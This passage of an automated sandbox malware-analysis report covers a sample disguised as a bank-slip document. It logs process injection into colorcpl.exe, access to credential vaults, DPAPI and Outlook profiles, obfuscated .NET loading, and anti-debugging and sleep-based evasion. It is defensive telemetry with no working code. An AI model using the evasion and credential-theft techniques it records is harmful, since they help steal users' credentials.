                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: PO1268931024 - Bank Slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO1268931024 - Bank Slip.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: PO1268931024 - Bank Slip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: colorcpl.pdbGCTL source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974188510.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000003.2048251287.000000000084C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: colorcpl.pdb source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974188510.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000003.2048251287.000000000084C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eiVHpMoiongmS.exe, 00000004.00000002.4157212412.00000000000FE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1977997505.0000000005079000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1976076736.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO1268931024 - Bank Slip.exe, PO1268931024 - Bank Slip.exe, 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000003.1977997505.0000000005079000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1976076736.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: PbnE.pdb source: PO1268931024 - Bank Slip.exe
                Source: Binary string: PbnE.pdbSHA2561 source: PO1268931024 - Bank Slip.exe

                Data Obfuscation

                Source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                Source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                Source: PO1268931024 - Bank Slip.exe, FormLogin.cs.Net Code: InitializeComponent
                Source: 0.2.PO1268931024 - Bank Slip.exe.44221f0.0.raw.unpack, p4J06R29nMDv7rCX0R.cs.Net Code: D2gBOyqNMv System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, p4J06R29nMDv7rCX0R.cs.Net Code: D2gBOyqNMv System.Reflection.Assembly.Load(byte[])
                Source: 4.2.eiVHpMoiongmS.exe.476cd14.1.raw.unpack, FormLogin.cs.Net Code: InitializeComponent
                Source: 7.2.colorcpl.exe.588cd14.2.raw.unpack, FormLogin.cs.Net Code: InitializeComponent
                Source: 8.2.firefox.exe.f52cd14.0.raw.unpack, FormLogin.cs.Net Code: InitializeComponent
                Source: PO1268931024 - Bank Slip.exeStatic PE information: 0xFF0DE143 [Fri Aug 7 14:48:35 2105 UTC]
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 0_2_07B30CE1 push ecx; iretd 0_2_07B30D1C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00406155 push ss; retf 2_2_00406160
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00403270 push eax; ret 2_2_00403272
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0040227F pushad ; retf 2_2_00402280
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0040BB30 push eax; ret 2_2_0040BB31
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00404DCD push ebx; iretd 2_2_00404DD8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_004066BD push edx; iretd 2_2_004066BF
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00413F7E pushad ; retf 2_2_00414025
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_00413FC5 pushad ; retf 2_2_00414025
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0176225F pushad ; ret 2_2_017627F9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_017627FA pushad ; ret 2_2_017627F9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_017909AD push ecx; mov dword ptr [esp], ecx 2_2_017909B6
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0176283D push eax; iretd 2_2_01762858
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_043385C5 push eax; ret 4_2_043385C6
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_04341EFD push esi; ret 4_2_04341F7C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_04341F24 push esi; ret 4_2_04341F7C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_04341F12 push esi; ret 4_2_04341F7C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_04341F57 push esi; ret 4_2_04341F7C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_04331862 push ebx; iretd 4_2_0433186D
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_04333152 push edx; iretd 4_2_04333154
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_04340A13 pushad ; retf 4_2_04340ABA
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_04340A5A pushad ; retf 4_2_04340ABA
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_043423E2 push 899D5642h; ret 4_2_043423E7
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_04332BEA push ss; retf 4_2_04332BF5
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_06C1264C push esi; ret 4_2_06C12671
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_06C12607 push esi; ret 4_2_06C12671
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_06C12619 push esi; ret 4_2_06C12671
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_06C01F57 push ebx; iretd 4_2_06C01F62
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_06C14F1B push ebp; iretd 4_2_06C14F1D
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_06C08CBA push eax; ret 4_2_06C08CBB
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Code function: 4_2_06C125F2 push esi; ret 4_2_06C12671
                Source: PO1268931024 - Bank Slip.exe Static PE information: section name: .text entropy: 7.944994526598998
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: PO1268931024 - Bank Slip.exe PID: 6240, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\colorcpl.exe API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\colorcpl.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\colorcpl.exe API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\colorcpl.exe API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\colorcpl.exe API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\colorcpl.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\colorcpl.exe API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\colorcpl.exe API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Memory allocated: 15C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Memory allocated: 3130000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Memory allocated: 15C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Memory allocated: A1B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Memory allocated: B1B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Memory allocated: B400000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Memory allocated: C400000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_017D096E rdtsc 2_2_017D096E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 2005
                Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 7969
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 2.6 %
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe TID: 6520 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe TID: 7004 Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe TID: 7004 Thread sleep count: 39 > 30
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe TID: 7004 Thread sleep time: -58500s >= -30000s
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe TID: 7004 Thread sleep count: 39 > 30
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe TID: 7004 Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 340 Thread sleep count: 2005 > 30
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 340 Thread sleep time: -4010000s >= -30000s
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 340 Thread sleep count: 7969 > 30
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 340 Thread sleep time: -15938000s >= -30000s
                Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 7_2_0321C3B0 FindFirstFileW,FindNextFileW,FindClose, 7_2_0321C3B0
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4157731214.0000000000850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKN
                Source: colorcpl.exe, 00000007.00000002.4157400312.000000000358D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2277855201.000001A0CF57C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_017D096E rdtsc 2_2_017D096E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_00417563 LdrLoadDll, 2_2_00417563
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_01834180 mov eax, dword ptr fs:[00000030h] 2_2_01834180
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0184C188 mov eax, dword ptr fs:[00000030h] 2_2_0184C188
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0181019F mov eax, dword ptr fs:[00000030h] 2_2_0181019F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_01796154 mov eax, dword ptr fs:[00000030h] 2_2_01796154
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0178C156 mov eax, dword ptr fs:[00000030h] 2_2_0178C156
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_018561C3 mov eax, dword ptr fs:[00000030h] 2_2_018561C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0180E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0180E1D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0180E1D0 mov ecx, dword ptr fs:[00000030h] 2_2_0180E1D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_017C0124 mov eax, dword ptr fs:[00000030h] 2_2_017C0124
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_018661E5 mov eax, dword ptr fs:[00000030h] 2_2_018661E5
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_017C01F8 mov eax, dword ptr fs:[00000030h] 2_2_017C01F8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h] 2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0183E10E mov ecx, dword ptr fs:[00000030h] 2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_01850115 mov eax, dword ptr fs:[00000030h] 2_2_01850115
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0183A118 mov ecx, dword ptr fs:[00000030h] 2_2_0183A118
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_0183A118 mov eax, dword ptr fs:[00000030h] 2_2_0183A118
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_01824144 mov eax, dword ptr fs:[00000030h] 2_2_01824144
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Code function: 2_2_01824144 mov ecx, dword ptr fs:[00000030h] 2_2_01824144
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01824144 mov eax, dword ptr fs:[00000030h]2_2_01824144
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01824144 mov eax, dword ptr fs:[00000030h]2_2_01824144
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01828158 mov eax, dword ptr fs:[00000030h]2_2_01828158
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864164 mov eax, dword ptr fs:[00000030h]2_2_01864164
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864164 mov eax, dword ptr fs:[00000030h]2_2_01864164
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A197 mov eax, dword ptr fs:[00000030h]2_2_0178A197
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A197 mov eax, dword ptr fs:[00000030h]2_2_0178A197
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A197 mov eax, dword ptr fs:[00000030h]2_2_0178A197
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D0185 mov eax, dword ptr fs:[00000030h]2_2_017D0185
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BC073 mov eax, dword ptr fs:[00000030h]2_2_017BC073
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01792050 mov eax, dword ptr fs:[00000030h]2_2_01792050
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018280A8 mov eax, dword ptr fs:[00000030h]2_2_018280A8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018560B8 mov eax, dword ptr fs:[00000030h]2_2_018560B8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018560B8 mov ecx, dword ptr fs:[00000030h]2_2_018560B8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A020 mov eax, dword ptr fs:[00000030h]2_2_0178A020
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178C020 mov eax, dword ptr fs:[00000030h]2_2_0178C020
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018120DE mov eax, dword ptr fs:[00000030h]2_2_018120DE
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018160E0 mov eax, dword ptr fs:[00000030h]2_2_018160E0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h]2_2_017AE016
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h]2_2_017AE016
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h]2_2_017AE016
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h]2_2_017AE016
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01814000 mov ecx, dword ptr fs:[00000030h]2_2_01814000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178C0F0 mov eax, dword ptr fs:[00000030h]2_2_0178C0F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D20F0 mov ecx, dword ptr fs:[00000030h]2_2_017D20F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017980E9 mov eax, dword ptr fs:[00000030h]2_2_017980E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0178A0E3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01826030 mov eax, dword ptr fs:[00000030h]2_2_01826030
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01816050 mov eax, dword ptr fs:[00000030h]2_2_01816050
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017880A0 mov eax, dword ptr fs:[00000030h]2_2_017880A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179208A mov eax, dword ptr fs:[00000030h]2_2_0179208A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018163C0 mov eax, dword ptr fs:[00000030h]2_2_018163C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184C3CD mov eax, dword ptr fs:[00000030h]2_2_0184C3CD
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018343D4 mov eax, dword ptr fs:[00000030h]2_2_018343D4
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018343D4 mov eax, dword ptr fs:[00000030h]2_2_018343D4
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E3DB mov eax, dword ptr fs:[00000030h]2_2_0183E3DB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E3DB mov eax, dword ptr fs:[00000030h]2_2_0183E3DB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E3DB mov ecx, dword ptr fs:[00000030h]2_2_0183E3DB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E3DB mov eax, dword ptr fs:[00000030h]2_2_0183E3DB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178C310 mov ecx, dword ptr fs:[00000030h]2_2_0178C310
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B0310 mov ecx, dword ptr fs:[00000030h]2_2_017B0310
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA30B mov eax, dword ptr fs:[00000030h]2_2_017CA30B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA30B mov eax, dword ptr fs:[00000030h]2_2_017CA30B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA30B mov eax, dword ptr fs:[00000030h]2_2_017CA30B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C63FF mov eax, dword ptr fs:[00000030h]2_2_017C63FF
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE3F0 mov eax, dword ptr fs:[00000030h]2_2_017AE3F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE3F0 mov eax, dword ptr fs:[00000030h]2_2_017AE3F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE3F0 mov eax, dword ptr fs:[00000030h]2_2_017AE3F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
